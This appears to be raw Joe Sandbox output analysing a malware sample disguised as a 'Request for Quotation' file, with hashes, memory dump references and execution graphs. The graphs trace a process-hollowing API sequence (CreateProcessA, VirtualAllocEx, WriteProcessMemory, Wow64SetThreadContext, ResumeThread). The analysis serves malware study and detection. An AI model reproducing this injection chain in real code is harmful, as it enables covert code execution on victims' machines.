                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d0fcb4a302086b6c28e22ab61e5e3f2e2c1abb60617109966e4a0eafca275d07
                                                                                                              • Instruction ID: 64f8e60bfc71cd06dbea28f2702ddaf7d26e62f5b8fd3a70944d10a229829a48
                                                                                                              • Opcode Fuzzy Hash: d0fcb4a302086b6c28e22ab61e5e3f2e2c1abb60617109966e4a0eafca275d07
                                                                                                              • Instruction Fuzzy Hash: 54113078F001498FDF14DFECD954BAEBBB1BB49311F00E4A1E808EB344E67099428B51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4515610178.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_10fd000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction ID: 0d0ee5201910dbba238884201cfeb91d3bbbcb3aba7665d4c046448e8561dbcb
                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction Fuzzy Hash: 9D11DD75504284DFDB12CF54C9C4B15BFA2FB84314F24C6AEEA894BA52C33AD44ACF62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a5b4e53737f127e004329ac11884522f8a98bfe802c48cd2bf80158187816dd9
                                                                                                              • Instruction ID: 46278af7a51a6c746a4270362399a7e1475e25fbf030d10fb6d23eb5a6dbadcc
                                                                                                              • Opcode Fuzzy Hash: a5b4e53737f127e004329ac11884522f8a98bfe802c48cd2bf80158187816dd9
                                                                                                              • Instruction Fuzzy Hash: 46014772B002556FCB519E989850AAF3FA7EFD8350F18801AFE04CB384DE728D129B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34b988a75e9ea408cd2503749b2c439380aa121d2ed162e5ffafe2a3fd168ed8
                                                                                                              • Instruction ID: 9d04e7280f3624fb7e69dd68742b613d7e1633e956a2b45c7f8ad21ef821347b
                                                                                                              • Opcode Fuzzy Hash: 34b988a75e9ea408cd2503749b2c439380aa121d2ed162e5ffafe2a3fd168ed8
                                                                                                              • Instruction Fuzzy Hash: 1B1164B6800249DFCB10CF99C945BEEBFF5EF48320F14841AE528A7211C339A550DFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d043b39aa83105df541ce75de77bb76ed0f74894de3ce146bfa48e8255f405c8
                                                                                                              • Instruction ID: 9a42c4e3388ee05a537a4ba2eb019a663633fe42b7ab5e905eb65fef0b23c2ce
                                                                                                              • Opcode Fuzzy Hash: d043b39aa83105df541ce75de77bb76ed0f74894de3ce146bfa48e8255f405c8
                                                                                                              • Instruction Fuzzy Hash: 83F021313202114B97255A2EE49962E7BDEEFC8E52305417AEF05C7365EE31CC038380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a2715a72a9abda1a17413c92e46b91c5f9c18a3a065cf48181d04850eac57be9
                                                                                                              • Instruction ID: c6c8d035035d5e2228d084dca113bc77cebd36fbbb080e4235dae3270cce9cb7
                                                                                                              • Opcode Fuzzy Hash: a2715a72a9abda1a17413c92e46b91c5f9c18a3a065cf48181d04850eac57be9
                                                                                                              • Instruction Fuzzy Hash: 331148B8D0420ADFCF41DFA8D8859EEBBB1FB49300F01856AD910A3354E7755A1ADFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f54838979100d7b752983fd6ded645998ec101168c978125cc041181b7ad2d96
                                                                                                              • Instruction ID: 6b812f207353b2704055a8696b850cec8e9ee5b26ac6e512499bc8abe0024963
                                                                                                              • Opcode Fuzzy Hash: f54838979100d7b752983fd6ded645998ec101168c978125cc041181b7ad2d96
                                                                                                              • Instruction Fuzzy Hash: 1DF09071914254DFCB519F68A8486EABFF5EF89321F048066E908C7251D2314955CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3a7f555627c312396af809822ff0b4785a8e15e6cd70de44ba8b6f9be60465f4
                                                                                                              • Instruction ID: 57f19e752f3c8eb9c8a64735abead773a58236a2468c6492a2c9aee0157c6823
                                                                                                              • Opcode Fuzzy Hash: 3a7f555627c312396af809822ff0b4785a8e15e6cd70de44ba8b6f9be60465f4
                                                                                                              • Instruction Fuzzy Hash: A7F08236B111225BEB26272D945816F7392ABC5A663594539CE029B759CF35CD0247C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 28dc774cd5428de46fb09d817c1b2e43ba3dd689224d4376d463d1708a29f02a
                                                                                                              • Instruction ID: bfe370a99da667d04b36751eb45a899dff148555ab457badb0d5747460ab715f
                                                                                                              • Opcode Fuzzy Hash: 28dc774cd5428de46fb09d817c1b2e43ba3dd689224d4376d463d1708a29f02a
                                                                                                              • Instruction Fuzzy Hash: D5F03AB1A21125CFCB84EF7CD54556E77F4AF0821072144A9D909DB321EB70DD008BD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fbfa8b414235f5ff082b77bcbdd2857b0e8c88ddbdc7224a631a131a443e4525
                                                                                                              • Instruction ID: ea53eff976fbb780f6531ad4b1f0bc6e8a60f95c13d28dd7c7b6e7e16b423404
                                                                                                              • Opcode Fuzzy Hash: fbfa8b414235f5ff082b77bcbdd2857b0e8c88ddbdc7224a631a131a443e4525
                                                                                                              • Instruction Fuzzy Hash: 4CE02635D54367CACB01E7F59C000EEBB34EDCB121B19899BC0A137090EB302219C7A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 138060164abbd26cdf59571771600aed9cc93ad5c8de935d5d1b5167e3b5f624
                                                                                                              • Instruction ID: 176a3dd11f2f6cc3ed20bd34dec62470fdb7d825f13745883ed7151ea225fc3b
                                                                                                              • Opcode Fuzzy Hash: 138060164abbd26cdf59571771600aed9cc93ad5c8de935d5d1b5167e3b5f624
                                                                                                              • Instruction Fuzzy Hash: C5E02BB28043978FCB47FB34E89648D3F77AB92300B04C656E0054E65ADEB4484A8B13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 797b58a0908ed2b2166e31f08a3245b2f4db8d4d8e4bffc680d6a1854a4fe2e7
                                                                                                              • Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
                                                                                                              • Opcode Fuzzy Hash: 797b58a0908ed2b2166e31f08a3245b2f4db8d4d8e4bffc680d6a1854a4fe2e7
                                                                                                              • Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction ID: 7930617fa5d51c39259ce62e19d9372f750b87a255e52d71a4f40799174ae589
                                                                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction Fuzzy Hash: 8AC0123321C1282BA365204FBC81AA3AA8DC2C92B4AA10137FF1C93200A8929C8002A8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa75666314f4472802adf3093eafd3cd411204230ac9146551cee0c79b5f2a6f
                                                                                                              • Instruction ID: 7a41b196844e2d09aa38273734c3c64bfb4c641392eb058ed4568f396abefbb3
                                                                                                              • Opcode Fuzzy Hash: aa75666314f4472802adf3093eafd3cd411204230ac9146551cee0c79b5f2a6f
                                                                                                              • Instruction Fuzzy Hash: 19D04275E1410DCBCB30DFA8F4894EDBB71EB99321B14642AD925A3255D63054558F11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 00ee99c08ec6b28724f7e81c04519595c91ddf1eb8b3f55a9e283d0624aa4b7c
                                                                                                              • Instruction ID: ccf56a4f08847c19208f4ad5e4c5abfa395ab00656c6ea65d20dd132484e872d
                                                                                                              • Opcode Fuzzy Hash: 00ee99c08ec6b28724f7e81c04519595c91ddf1eb8b3f55a9e283d0624aa4b7c
                                                                                                              • Instruction Fuzzy Hash: E8D0673AB400189FCB149F98E8848DDF776FB98221B048116EA15A3265C6319925DB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e22628a84785c3fa8702de3e82ec08fa68239f062a9d5760a6f2f0d0bc9b3b0
                                                                                                              • Instruction ID: 281065f6d04ded2e72cf7bb440c43f494aefa466b9566facd8a98caf75b25cdd
                                                                                                              • Opcode Fuzzy Hash: 2e22628a84785c3fa8702de3e82ec08fa68239f062a9d5760a6f2f0d0bc9b3b0
                                                                                                              • Instruction Fuzzy Hash: 4EC0127200070ACAC605FB76FC85955376AA7802047409914B0050A74DEE7468995792
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xwq$Xwq$Xwq$Xwq
                                                                                                              • API String ID: 0-1964751375
                                                                                                              • Opcode ID: 4ff7cfe9be041963d90a47fd3f1deee207e6999101d5a93847f8cca553eda26a
                                                                                                              • Instruction ID: 080a924db8dd1e1e2be5c8440dada298906a49abc18c68bc960d946d08c87543
                                                                                                              • Opcode Fuzzy Hash: 4ff7cfe9be041963d90a47fd3f1deee207e6999101d5a93847f8cca553eda26a
                                                                                                              • Instruction Fuzzy Hash: 3E317371E1421ACBDFB5CA6C88C13BEBBB6BB94350F144469C915A73C1EF708A418B92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \;sq$\;sq$\;sq$\;sq
                                                                                                              • API String ID: 0-2251010532
                                                                                                              • Opcode ID: 197a86e04a605cb25e636799150ca6819f29db3e91d7a0fd9d59ee79c31decd7
                                                                                                              • Instruction ID: e5c0462bfbdf61af822bb13d6dd20a50a3af1dd3d70f5d6518322d19dee73951
                                                                                                              • Opcode Fuzzy Hash: 197a86e04a605cb25e636799150ca6819f29db3e91d7a0fd9d59ee79c31decd7
                                                                                                              • Instruction Fuzzy Hash: 1A01DF317301068FDBA48A2CC4C0AA5B7F6BFC86607A5406AEA05CB372DE71DC818781

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.2%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:177
                                                                                                              Total number of Limit Nodes:8
                                                                                                              execution_graph 24094 69a840a 24095 69a8630 24094->24095 24096 69a8414 24094->24096 24100 69aa0b8 24096->24100 24116 69aa118 24096->24116 24133 69aa0c8 24096->24133 24101 69aa0c8 24100->24101 24107 69aa0ea 24101->24107 24149 69aaed9 24101->24149 24154 69aa9a1 24101->24154 24158 69aa4e1 24101->24158 24164 69aa563 24101->24164 24169 69aa7e3 24101->24169 24173 69aa4c2 24101->24173 24178 69aa80b 24101->24178 24183 69aae4b 24101->24183 24188 69aa8b7 24101->24188 24193 69aa856 24101->24193 24197 69aa97c 24101->24197 24202 69aabbc 24101->24202 24206 69aab3e 24101->24206 24107->24095 24117 69aa100 24116->24117 24119 69aa122 24116->24119 24118 69aa0ea 24117->24118 24120 69aaed9 2 API calls 24117->24120 24121 69aab3e 2 API calls 24117->24121 24122 69aabbc 2 API calls 24117->24122 24123 69aa97c 2 API calls 24117->24123 24124 69aa856 2 API calls 24117->24124 24125 69aa8b7 2 API calls 24117->24125 24126 69aae4b 2 API calls 24117->24126 24127 69aa80b 2 API calls 24117->24127 24128 69aa4c2 2 API calls 24117->24128 24129 69aa7e3 2 API calls 24117->24129 24130 69aa563 2 API calls 24117->24130 24131 69aa4e1 2 API calls 24117->24131 24132 69aa9a1 2 API calls 24117->24132 24118->24095 24119->24095 24120->24118 24121->24118 24122->24118 24123->24118 24124->24118 24125->24118 24126->24118 24127->24118 24128->24118 24129->24118 24130->24118 24131->24118 24132->24118 24134 69aa0e2 24133->24134 24135 69aa0ea 24134->24135 24136 69aaed9 2 API calls 24134->24136 24137 69aab3e 2 API calls 24134->24137 24138 69aabbc 2 API calls 24134->24138 24139 69aa97c 2 API calls 24134->24139 24140 69aa856 2 API calls 24134->24140 24141 69aa8b7 2 API calls 24134->24141 24142 69aae4b 2 API calls 24134->24142 24143 69aa80b 2 API calls 24134->24143 24144 69aa4c2 2 API calls 24134->24144 24145 69aa7e3 2 API calls 24134->24145 24146 69aa563 2 API calls 24134->24146 24147 69aa4e1 2 API calls 24134->24147 24148 69aa9a1 2 API calls 24134->24148 24135->24095 24136->24135 24137->24135 24138->24135 24139->24135 24140->24135 24141->24135 24142->24135 24143->24135 24144->24135 24145->24135 24146->24135 24147->24135 24148->24135 24150 69aaf09 24149->24150 24211 69a7c28 24150->24211 24215 69a7c20 24150->24215 24151 69aaf27 24219 69a7dd8 24154->24219 24223 69a7dd0 24154->24223 24155 69aa639 24155->24107 24159 69aa4ee 24158->24159 24160 69aa4c2 24158->24160 24159->24107 24227 69a7f70 24160->24227 24231 69a7f64 24160->24231 24165 69aa571 24164->24165 24167 69a7f70 CreateProcessA 24165->24167 24168 69a7f64 CreateProcessA 24165->24168 24166 69aa60e 24167->24166 24168->24166 24170 69aa7f3 24169->24170 24235 69a7ce8 24170->24235 24239 69a7ce0 24170->24239 24174 69aa4d0 24173->24174 24176 69a7f70 CreateProcessA 24174->24176 24177 69a7f64 CreateProcessA 24174->24177 24175 69aa60e 24176->24175 24177->24175 24179 69aa811 24178->24179 24243 69a7a98 24179->24243 24247 69a7aa0 24179->24247 24180 69aa837 24180->24107 24184 69aace7 24183->24184 24184->24183 24185 69aae8b 24184->24185 24251 69ab168 24184->24251 24256 69ab166 24184->24256 24185->24107 24189 69aa8bd 24188->24189 24191 69a7ce8 WriteProcessMemory 24189->24191 24192 69a7ce0 WriteProcessMemory 24189->24192 24190 69aab76 24191->24190 24192->24190 24195 69a7ce8 WriteProcessMemory 24193->24195 24196 69a7ce0 WriteProcessMemory 24193->24196 24194 69aa87a 24194->24107 24195->24194 24196->24194 24198 69aa822 24197->24198 24199 69aa837 24198->24199 24200 69a7a98 ResumeThread 24198->24200 24201 69a7aa0 ResumeThread 24198->24201 24199->24107 24200->24199 24201->24199 24204 69a7b48 Wow64SetThreadContext 24202->24204 24205 69a7b50 Wow64SetThreadContext 24202->24205 24203 69aabd6 24204->24203 24205->24203 24207 69aab44 24206->24207 24209 69a7ce8 WriteProcessMemory 24207->24209 24210 69a7ce0 WriteProcessMemory 24207->24210 24208 69aab76 24209->24208 24210->24208 24212 69a7c68 VirtualAllocEx 24211->24212 24214 69a7ca5 24212->24214 24214->24151 24216 69a7c28 VirtualAllocEx 24215->24216 24218 69a7ca5 24216->24218 24218->24151 24220 69a7e23 ReadProcessMemory 24219->24220 24222 69a7e67 24220->24222 24222->24155 24224 69a7dd8 ReadProcessMemory 24223->24224 24226 69a7e67 24224->24226 24226->24155 24228 69a7ff9 24227->24228 24228->24228 24229 69a815e CreateProcessA 24228->24229 24230 69a81bb 24229->24230 24230->24230 24232 69a7f70 24231->24232 24232->24232 24233 69a815e CreateProcessA 24232->24233 24234 69a81bb 24233->24234 24234->24234 24236 69a7d30 WriteProcessMemory 24235->24236 24238 69a7d87 24236->24238 24238->24170 24240 69a7ce8 WriteProcessMemory 24239->24240 24242 69a7d87 24240->24242 24242->24170 24244 69a7a9e ResumeThread 24243->24244 24246 69a7b11 24244->24246 24246->24180 24248 69a7aa9 ResumeThread 24247->24248 24250 69a7b11 24248->24250 24250->24180 24252 69ab17d 24251->24252 24261 69a7b48 24252->24261 24265 69a7b50 24252->24265 24253 69ab193 24253->24184 24257 69ab168 24256->24257 24259 69a7b48 Wow64SetThreadContext 24257->24259 24260 69a7b50 Wow64SetThreadContext 24257->24260 24258 69ab193 24258->24184 24259->24258 24260->24258 24262 69a7b50 Wow64SetThreadContext 24261->24262 24264 69a7bdd 24262->24264 24264->24253 24266 69a7b95 Wow64SetThreadContext 24265->24266 24268 69a7bdd 24266->24268 24268->24253 24269 bd4668 24270 bd4672 24269->24270 24272 bd4758 24269->24272 24273 bd477d 24272->24273 24277 bd4868 24273->24277 24281 bd4858 24273->24281 24279 bd488f 24277->24279 24278 bd496c 24278->24278 24279->24278 24285 bd44b0 24279->24285 24283 bd488f 24281->24283 24282 bd496c 24283->24282 24284 bd44b0 CreateActCtxA 24283->24284 24284->24282 24286 bd58f8 CreateActCtxA 24285->24286 24288 bd59bb 24286->24288 24288->24288 24313 69ab320 24314 69ab346 24313->24314 24315 69ab4ab 24313->24315 24314->24315 24317 69a63e0 24314->24317 24318 69ab5a0 PostMessageW 24317->24318 24319 69ab60c 24318->24319 24319->24314 24092 bdd5f0 DuplicateHandle 24093 bdd686 24092->24093 24289 bdcfa0 24290 bdcfe6 GetCurrentProcess 24289->24290 24292 bdd038 GetCurrentThread 24290->24292 24293 bdd031 24290->24293 24294 bdd06e 24292->24294 24295 bdd075 GetCurrentProcess 24292->24295 24293->24292 24294->24295 24298 bdd0ab 24295->24298 24296 bdd0d3 GetCurrentThreadId 24297 bdd104 24296->24297 24298->24296 24299 bdac10 24300 bdac1f 24299->24300 24303 bdacf8 24299->24303 24308 bdad08 24299->24308 24304 bdad3c 24303->24304 24305 bdad19 24303->24305 24304->24300 24305->24304 24306 bdaf40 GetModuleHandleW 24305->24306 24307 bdaf6d 24306->24307 24307->24300 24309 bdad19 24308->24309 24310 bdad3c 24308->24310 24309->24310 24311 bdaf40 GetModuleHandleW 24309->24311 24310->24300 24312 bdaf6d 24311->24312 24312->24300

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 294 bdcf90-bdd02f GetCurrentProcess 298 bdd038-bdd06c GetCurrentThread 294->298 299 bdd031-bdd037 294->299 300 bdd06e-bdd074 298->300 301 bdd075-bdd0a9 GetCurrentProcess 298->301 299->298 300->301 303 bdd0ab-bdd0b1 301->303 304 bdd0b2-bdd0cd call bdd578 301->304 303->304 306 bdd0d3-bdd102 GetCurrentThreadId 304->306 308 bdd10b-bdd16d 306->308 309 bdd104-bdd10a 306->309 309->308
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00BDD01E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 00BDD05B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00BDD098
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BDD0F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: d8e31a5786bf49b858c07eb21bb82e00b24292119cf59330779e8a82f660e6de
                                                                                                              • Instruction ID: 909d501364f8f4dc27c70be91588f25e74916a8534e9a945f23250e94904ad6b
                                                                                                              • Opcode Fuzzy Hash: d8e31a5786bf49b858c07eb21bb82e00b24292119cf59330779e8a82f660e6de
                                                                                                              • Instruction Fuzzy Hash: B45188B0901349CFDB54DFA9D548B9EBBF1FF88314F24849AE409A7350DB38A945CB62

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 316 bdcfa0-bdd02f GetCurrentProcess 320 bdd038-bdd06c GetCurrentThread 316->320 321 bdd031-bdd037 316->321 322 bdd06e-bdd074 320->322 323 bdd075-bdd0a9 GetCurrentProcess 320->323 321->320 322->323 325 bdd0ab-bdd0b1 323->325 326 bdd0b2-bdd0cd call bdd578 323->326 325->326 328 bdd0d3-bdd102 GetCurrentThreadId 326->328 330 bdd10b-bdd16d 328->330 331 bdd104-bdd10a 328->331 331->330
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00BDD01E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 00BDD05B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00BDD098
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BDD0F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: bb1ab7d7dfe24920809bd4c76d3bef7aef2ddcbf1032db85d26af9e63b456445
                                                                                                              • Instruction ID: a0bbcc38ecf56c90f67ce0cef55a0c5703c7bced07c64f26a5c92bdc7997b764
                                                                                                              • Opcode Fuzzy Hash: bb1ab7d7dfe24920809bd4c76d3bef7aef2ddcbf1032db85d26af9e63b456445
                                                                                                              • Instruction Fuzzy Hash: 695177B0901309CFDB54DFA9C548B9EBBF5FF88314F20845AE409A7350D778A945CB62

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 530 69a7f64-69a8005 533 69a803e-69a805e 530->533 534 69a8007-69a8011 530->534 541 69a8060-69a806a 533->541 542 69a8097-69a80c6 533->542 534->533 535 69a8013-69a8015 534->535 536 69a8038-69a803b 535->536 537 69a8017-69a8021 535->537 536->533 539 69a8023 537->539 540 69a8025-69a8034 537->540 539->540 540->540 543 69a8036 540->543 541->542 544 69a806c-69a806e 541->544 548 69a80c8-69a80d2 542->548 549 69a80ff-69a81b9 CreateProcessA 542->549 543->536 546 69a8070-69a807a 544->546 547 69a8091-69a8094 544->547 550 69a807e-69a808d 546->550 551 69a807c 546->551 547->542 548->549 553 69a80d4-69a80d6 548->553 562 69a81bb-69a81c1 549->562 563 69a81c2-69a8248 549->563 550->550 552 69a808f 550->552 551->550 552->547 554 69a80d8-69a80e2 553->554 555 69a80f9-69a80fc 553->555 557 69a80e6-69a80f5 554->557 558 69a80e4 554->558 555->549 557->557 560 69a80f7 557->560 558->557 560->555 562->563 573 69a824a-69a824e 563->573 574 69a8258-69a825c 563->574 573->574 575 69a8250 573->575 576 69a825e-69a8262 574->576 577 69a826c-69a8270 574->577 575->574 576->577 578 69a8264 576->578 579 69a8272-69a8276 577->579 580 69a8280-69a8284 577->580 578->577 579->580 581 69a8278 579->581 582 69a8296-69a829d 580->582 583 69a8286-69a828c 580->583 581->580 584 69a829f-69a82ae 582->584 585 69a82b4 582->585 583->582 584->585 587 69a82b5 585->587 587->587
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069A81A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: f3002f82535b532d048bb5367861cd8f6228869c2f7a6c001ff89ac1eade7a6f
